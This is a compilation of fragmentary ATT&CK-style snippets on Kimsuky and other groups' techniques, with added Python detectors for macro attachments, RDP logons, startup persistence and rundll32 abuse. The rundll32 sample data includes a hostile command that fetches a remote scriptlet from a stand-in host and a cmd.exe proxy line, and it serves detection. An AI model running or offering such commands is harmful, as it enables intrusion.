…December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020. Sygnia Team. (2024, June 3). China-Nexus Threat Group ‘Velvet Ant’ Abuses F5 Load Balancers for Persistence. Retrieved March 14, 2025. Kaspersky Lab's Global Researc…
…33] S0201 JPIN JPIN can lower security settings by changing Registry keys. [34] G0094 Kimsuky Kimsuky has been observed turning off Windows Security Center. [35] G0032 Lazarus Group Lazarus Group malware TangoDelta attempts to terminate various processes associated with McAfee. A…
…H_SPY can exfiltrate collected information from the host to the C2 server. [48] G0094 Kimsuky Kimsuky has exfiltrated data over its email C2 channel. [49] G0032 Lazarus Group Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is uploaded t…
…apeka Kapeka queries registry values for stored configuration information. [60] G0094 Kimsuky Kimsuky has obtained specific Registry keys and values on a compromised host. [61] G0032 Lazarus Group Lazarus Group malware IndiaIndia checks Registry keys within HKCU and HKLM to deter…
…GH_SPY has been spread through Word documents containing malicious macros. [45] G0094 Kimsuky Kimsuky has attempted to lure victims into opening malicious e-mail attachments. [89] [90] [91] [45] [6] G0032 Lazarus Group Lazarus Group has attempted to get users to launch a mal…
…rrdown Kerrdown has been distributed through malicious e-mail attachments. [29] G0094 Kimsuky Kimsuky has used emails containing Word, Excel and/or HWP (Hangul Word Processor) documents in their spearphishing campaigns. [101] [102] [103] [104] [105] [6] G0032 Lazarus Group Lazaru…
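The attachment types named above (macro-bearing Word and Excel documents, HWP files) are the kind a mail gateway or analyst triages by container type before anything is opened. The following check is an added example written for this page; it is not code from ATT&CK, from Kimsuky tooling, or from any product cited here. It recognises OOXML packages by ZIP magic and looks for a vbaProject.bin part, recognises OLE compound containers (legacy Office and HWP 5.x) by magic, and flags a VBA project inside a file whose extension does not claim to be macro-enabled. The macro-extension list, the raw-byte search for the HWP FileHeader signature, and the sample documents built inline are all assumptions of this example.

```python
import io
import zipfile

ZIP_MAGIC = b"PK\x03\x04"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .doc/.xls and HWP 5.x containers
HWP_SIGNATURE = b"HWP Document File"             # start of the HWP 5.x FileHeader stream (heuristic raw search)

# Assumption: extensions Office treats as macro-enabled; a VBA project anywhere else is worth a look
MACRO_EXTENSIONS = {".docm", ".dotm", ".xlsm", ".xltm", ".xlsb", ".pptm", ".potm", ".ppam"}


def classify_attachment(filename: str, data: bytes) -> dict:
    """Triage one attachment body by container magic and macro indicators."""
    ext = ("." + filename.rsplit(".", 1)[-1].lower()) if "." in filename else ""
    result = {"filename": filename, "format": "other", "has_vba": False, "flags": []}
    if data.startswith(ZIP_MAGIC):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as z:
                names = z.namelist()
        except zipfile.BadZipFile:
            result["flags"].append("corrupt-zip")
            return result
        result["format"] = "ooxml"
        # OOXML stores macros in a vbaProject.bin part under word/, xl/ or ppt/
        result["has_vba"] = any(n.lower().endswith("vbaproject.bin") for n in names)
        if result["has_vba"]:
            result["flags"].append("vba-project-present")
            if ext not in MACRO_EXTENSIONS:
                result["flags"].append("vba-in-non-macro-extension")
    elif data.startswith(OLE_MAGIC):
        result["format"] = "hwp5" if HWP_SIGNATURE in data else "ole"
        # Macro or script streams inside OLE need the directory parsed; hand off to a deeper analyser
        result["flags"].append("ole-needs-stream-inspection")
    return result


def build_sample_docx(with_macro: bool) -> bytes:
    """Constructed minimal OOXML package (not a real document) used only for demonstration."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 constructed vba stub")
    return buf.getvalue()


# Constructed OLE-like blob carrying the HWP 5.x header signature (not a real HWP file)
SAMPLE_HWP = OLE_MAGIC + b"\x00" * 504 + HWP_SIGNATURE.ljust(32, b"\x00")

if __name__ == "__main__":
    for name, body in [("invoice.docx", build_sample_docx(True)),
                       ("report.docx", build_sample_docx(False)),
                       ("brief.hwp", SAMPLE_HWP)]:
        print(classify_attachment(name, body))
```

The OLE branch deliberately stops at classification: deciding whether a legacy .doc or an HWP file carries a macro or embedded script requires walking the compound-file directory, which belongs in a dedicated parser rather than a gateway check.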
…ed RDP for lateral movement. [44] S0283 jRAT jRAT can support RDP control. [45] G0094 Kimsuky Kimsuky has used RDP for direct remote point-and-click access. [46] S0250 Koadic Koadic can enable remote desktop on the victim's machine. [47] G0032 Lazarus Group Lazarus Group malware …
…emote Desktop Users group membership regularly. Remove unnecessary accounts and groups from Remote Desktop Users groups. M1042 Disable or Remove Feature or Program Disable the RDP service if it is unnecessary. M1035 Limit Access to Resource Over Network Use remote desktop gateway…
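The mitigations above (prune the Remote Desktop Users group, disable RDP where unneeded, force sessions through a remote desktop gateway) each have a matching check. The code below is an added example for this page, not code from ATT&CK or from any vendor it cites: it reviews a group membership list against an approved set, and it scans Windows Security 4624 records for RemoteInteractive (LogonType 10) sessions that did not arrive via the gateway, came from outside the internal ranges, or used an account not approved for RDP. The gateway address, internal ranges, approved accounts, and the event records are constructed assumptions.

```python
import ipaddress

# Assumptions (not from the page): the RD Gateway's address, internal ranges, and approved RDP principals
RD_GATEWAY = ipaddress.ip_network("10.0.5.10/32")
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]
APPROVED_RDP_USERS = {"CORP\\helpdesk-rdp", "CORP\\svc-backup"}

# Constructed 4624 records with the field names the Security log uses
SAMPLE_EVENTS = [
    {"EventID": 4624, "LogonType": 10, "TargetDomainName": "CORP", "TargetUserName": "helpdesk-rdp",
     "IpAddress": "10.0.5.10", "WorkstationName": "RDGW01"},
    {"EventID": 4624, "LogonType": 10, "TargetDomainName": "CORP", "TargetUserName": "jdoe",
     "IpAddress": "10.20.3.44", "WorkstationName": "WS-JDOE"},
    {"EventID": 4624, "LogonType": 10, "TargetDomainName": "FILESRV01", "TargetUserName": "Administrator",
     "IpAddress": "203.0.113.7", "WorkstationName": "-"},
    {"EventID": 4624, "LogonType": 3, "TargetDomainName": "CORP", "TargetUserName": "jdoe",
     "IpAddress": "10.20.3.44", "WorkstationName": "WS-JDOE"},
]


def stale_rdp_group_members(members) -> list:
    """Group members (DOMAIN\\user strings) that are not on the approved list and should be removed."""
    return sorted(set(members) - APPROVED_RDP_USERS)


def rdp_logon_findings(events) -> list:
    """Flag RemoteInteractive logons that bypass the gateway, originate externally, or use unapproved accounts."""
    findings = []
    for e in events:
        if e.get("EventID") != 4624 or e.get("LogonType") != 10:
            continue  # only RDP (RemoteInteractive) sessions are in scope
        user = e["TargetDomainName"] + "\\" + e["TargetUserName"]
        src = e.get("IpAddress", "-")
        reasons = []
        try:
            ip = ipaddress.ip_address(src)
        except ValueError:
            ip = None
            reasons.append("no-source-ip")
        if ip is not None:
            if ip not in RD_GATEWAY:
                reasons.append("bypassed-rd-gateway")   # session host should only see the gateway as peer
            if not any(ip in net for net in INTERNAL_NETS):
                reasons.append("external-source")
        if user not in APPROVED_RDP_USERS:
            reasons.append("unapproved-account")
        if reasons:
            findings.append({"user": user, "source": src, "reasons": reasons})
    return findings


if __name__ == "__main__":
    print(stale_rdp_group_members(["CORP\\helpdesk-rdp", "CORP\\jdoe", "CORP\\contractor7"]))
    for f in rdp_logon_findings(SAMPLE_EVENTS):
        print(f)
```

On a real host the membership list comes from `net localgroup "Remote Desktop Users"` or the equivalent PowerShell cmdlet, and the 4624 records from the Security log; the gateway check assumes the session host's firewall only accepts 3389 from the gateway, so any other source is a policy gap rather than merely a curiosity.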
…GH_SPY KGH_SPY can send a file containing victim system information to C2. [66] G0094 Kimsuky Kimsuky has collected Office, PDF, and HWP documents from its victims. [67] S0250 Koadic Koadic can download files off the target system to send back to the server. [68] G0032 Lazarus Gr…
…December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020. Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018. Bizeul, D., Fontarensky, I., Mouchoux, R., Perigaud, F., Per…
…hang Several Ke3chang backdoors achieved persistence by adding a Run key. [117] G0094 Kimsuky Kimsuky has placed scripts in the startup folder for persistence. [118] [33] [119] S0356 KONNI A version of KONNI drops a Windows shortcut into the Startup folder to establish persistenc…
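The three persistence mechanisms listed here (Run key, script in the Startup folder, shortcut dropped into the Startup folder) all leave file-create or registry-set telemetry. The following detection logic is an added example for this page and not code from ATT&CK or from any cited tool: it walks Sysmon-style records, matching Event ID 11 (FileCreate) paths under either Startup folder and Event ID 13 (RegistryEvent SetValue) paths under Run/RunOnce, rates a finding higher when a script host is the writer or the configured command, and suppresses .lnk files written by explorer.exe as install-time noise. The event records, the baseline writer list, and the script-host list are constructed assumptions.

```python
import re

STARTUP_RE = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.I)   # per-user and ProgramData
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)\\", re.I)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe")
# Assumption: shortcuts written by the shell during ordinary installs are baseline noise
BASELINE_WRITERS = {r"c:\windows\explorer.exe"}

# Constructed Sysmon-style records (EventID 11 = FileCreate, EventID 13 = RegistryEvent SetValue)
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": r"C:\Windows\System32\wscript.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinUpdate.vbs"},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Vendor Agent.lnk"},
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-1004336348-1177238915-682003330-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveUpd",
     "Details": r'wscript.exe //B "C:\Users\alice\AppData\Local\Temp\sync.vbs"'},
    {"EventID": 11, "Image": r"C:\Windows\System32\notepad.exe",
     "TargetFilename": r"C:\Users\alice\Documents\notes.txt"},
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Program Files\Vendor\agent.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "Details": r'"C:\Program Files\Vendor\agent.exe" --tray'},
]


def startup_persistence_findings(events) -> list:
    """Return Startup-folder drops and Run-key writes, each tagged with technique and severity."""
    findings = []
    for e in events:
        if e.get("EventID") == 11 and STARTUP_RE.search(e.get("TargetFilename", "")):
            image = e.get("Image", "").lower()
            target = e["TargetFilename"]
            if image in BASELINE_WRITERS and target.lower().endswith(".lnk"):
                continue  # shell-written shortcut during an install: tune per environment
            writer = image.rsplit("\\", 1)[-1]
            findings.append({"technique": "startup-folder", "image": e["Image"], "artifact": target,
                             "severity": "high" if writer in SCRIPT_HOSTS else "medium"})
        elif (e.get("EventID") == 13 and e.get("EventType") == "SetValue"
              and RUN_KEY_RE.search(e.get("TargetObject", ""))):
            details = e.get("Details", "").lower()
            findings.append({"technique": "run-key", "image": e["Image"], "artifact": e["TargetObject"],
                             "severity": "high" if any(h in details for h in SCRIPT_HOSTS) else "medium"})
    return findings


if __name__ == "__main__":
    for f in startup_persistence_findings(SAMPLE_EVENTS):
        print(f["severity"], f["technique"], f["artifact"])
```

The medium-severity hits are the ones that need a software inventory to resolve; the high-severity ones (a script host writing into Startup, or a Run value whose command launches a script host) are rarely legitimate on a managed workstation.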
…eat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021. Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021. Roccia, T., …
…guage models (LLMs) to gather information about satellite capabilities. [3] [4] G0094 Kimsuky Kimsuky has collected victim organization information including but not limited to organization hierarchy, functions, press releases, and others. [5] Kimsuky has also used large language…
…eka Kapeka is a Windows DLL file executed via ordinal by rundll32.exe [64] [65] G0094 Kimsuky Kimsuky has used rundll32.exe to execute malicious scripts and malware on a victim's network. [66] S0250 Koadic Koadic can use Rundll32 to execute additional payloads. [67] S0356 KONNI K…
…a Kapeka is a Windows DLL file executed via ordinal by rundll32.exe. [66] [67] G0094 Kimsuky Kimsuky has used rundll32.exe to execute malicious scripts and malware on a victim's network. [68] S0250 Koadic Koadic can use Rundll32 to execute additional payloads. [69] S0356 KONNI K…
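Execution through rundll32.exe, as described for Kapeka (DLL loaded by ordinal), Kimsuky, and Koadic above, is visible in process-creation command lines, and the useful signal is in how the DLL and export are specified rather than in rundll32 itself. The following triage logic is an added example for this page, not code from ATT&CK or from any tool it cites: it parses a rundll32 command line into DLL, export, and trailing arguments, then flags an ordinal export, a missing export (only DllMain runs), a library loaded from a user-writable path, a non-library extension, the javascript:/mshtml script-protocol form, and the shell32 ShellExec_RunDLL proxy. The sample command lines, the user-writable path fragments, and the extension list are constructed assumptions.

```python
import re

# Assumptions (not from the page): path fragments treated as user-writable, extensions accepted as libraries
USER_WRITABLE_FRAGMENTS = ("\\users\\", "\\appdata\\", "\\programdata\\", "\\temp\\", "\\public\\")
LIBRARY_EXTS = {".dll", ".cpl", ".ocx", ".drv", ".ax"}

# Matches quoted or unquoted rundll32(.exe), with or without a directory, and captures the argument string
_RUNDLL_RE = re.compile(r'^\s*"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s+(.*)$', re.I)

# Constructed process-creation command lines
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\rundll32.exe C:\Users\Public\Libraries\kp.dll,#1",
    r"rundll32.exe shell32.dll,Control_RunDLL hotplug.dll",
    r'"C:\Windows\System32\rundll32.exe" C:\ProgramData\update\svc.txt,DllRegisterServer',
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://example.invalid/x.sct")',
    r"rundll32.exe C:\Windows\Temp\a.dll",
    r"rundll32.exe shell32.dll,ShellExec_RunDLL cmd.exe /c whoami",
    r"C:\Windows\System32\svchost.exe -k netsvcs",
]


def _split_args(args: str):
    """Split 'dll,export trailing' into (dll, export or None, trailing); dll may be quoted."""
    if args.startswith('"'):
        end = args.find('"', 1)
        if end == -1:
            return args[1:], None, ""
        dll, rest = args[1:end], args[end + 1:]
    else:
        m = re.match(r"^([^,\s]+)(.*)$", args)
        if not m:
            return args, None, ""
        dll, rest = m.group(1), m.group(2)
    if rest.startswith(","):
        m = re.match(r"^,(\S*)\s*(.*)$", rest)
        return dll, m.group(1), m.group(2)
    return dll, None, rest.strip()


def analyze_rundll32(cmdline: str):
    """Return {dll, export, args, flags} for a rundll32 command line, or None if it is not one."""
    m = _RUNDLL_RE.match(cmdline)
    if not m:
        return None
    args = m.group(1).strip()
    dll, export, rest = _split_args(args)
    low = dll.lower()
    base = low.replace("/", "\\").rsplit("\\", 1)[-1]
    ext = ("." + base.rsplit(".", 1)[-1]) if "." in base else ""   # no extension is normal (user32,LockWorkStation)
    flags = []
    if args.lower().startswith(("javascript:", "vbscript:")) or "mshtml" in low:
        flags.append("script-protocol")
    if export is None:
        flags.append("no-export")            # rundll32 still loads the DLL, so DllMain executes
    elif export.startswith("#"):
        flags.append("ordinal-export")       # export referenced by ordinal instead of name
    elif base in ("shell32.dll", "shell32") and export.lower() == "shellexec_rundll":
        flags.append("shellexec-proxy")      # launches an arbitrary command via ShellExecute
    if ext and ext not in LIBRARY_EXTS:
        flags.append("non-library-extension")
    if any(frag in low for frag in USER_WRITABLE_FRAGMENTS):
        flags.append("user-writable-path")
    return {"dll": dll, "export": export, "args": rest, "flags": flags}


def triage(cmdlines) -> list:
    """Keep only rundll32 invocations that raised at least one flag."""
    out = []
    for c in cmdlines:
        r = analyze_rundll32(c)
        if r and r["flags"]:
            out.append({"cmdline": c, **r})
    return out


if __name__ == "__main__":
    for hit in triage(SAMPLE_CMDLINES):
        print(hit["flags"], hit["cmdline"])
```

Benign administrative use of rundll32 (Control Panel applets, printer UI, `url.dll,FileProtocolHandler`) produces no flags under these rules, so the remaining hits are worth an analyst's time; the DLL path alone is often enough to tell an installer's temp directory from a staging location like C:\Users\Public.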